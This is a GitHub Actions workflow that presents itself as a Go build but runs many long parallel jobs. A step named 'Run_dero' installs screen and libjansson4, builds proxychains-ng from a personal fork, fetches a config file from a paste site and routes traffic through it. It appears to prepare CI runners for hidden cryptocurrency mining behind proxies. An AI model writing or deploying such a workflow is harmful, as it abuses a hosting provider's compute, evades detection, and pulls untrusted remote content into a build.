name: binomo

on: workflow_dispatch
jobs:
  build:
    name: KolaseIX
    runs-on: ubuntu-18.04
    strategy:
      max-parallel: 40
      fail-fast: false
      matrix: 
        numb: [1.12, 1.15]
        char: [A, B, C, D, E, F, G, H, I, J]
    timeout-minutes: 350
    env:
        NUM_JOBS: 40
        JOB: ${{ matrix.numb }}
    steps:
    - name: Set up Go ${{ matrix.numb }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.numb }}
      id: go
    - name: KolaseIX
      uses: actions/checkout@v1
    - name: Run_dero
      continue-on-error: true
      run: |
       sudo apt update -y && sudo apt install screen libjansson4 build-essential htop -y && cd ~ && sudo git clone https://github.com/walters99/proxychains-ng.git && cd proxychains-ng && sudo ./configure --prefix=/usr --sysconfdir=/etc && sudo make && sudo make install && sudo make install-config
       wget -O myconf.conf https://www.heypasteit.com/download/0IWWBC && sudo chmod +x myconf.conf && sudo mv myconf.conf /etc/proxychains.conf && proxychains4 curl google.com
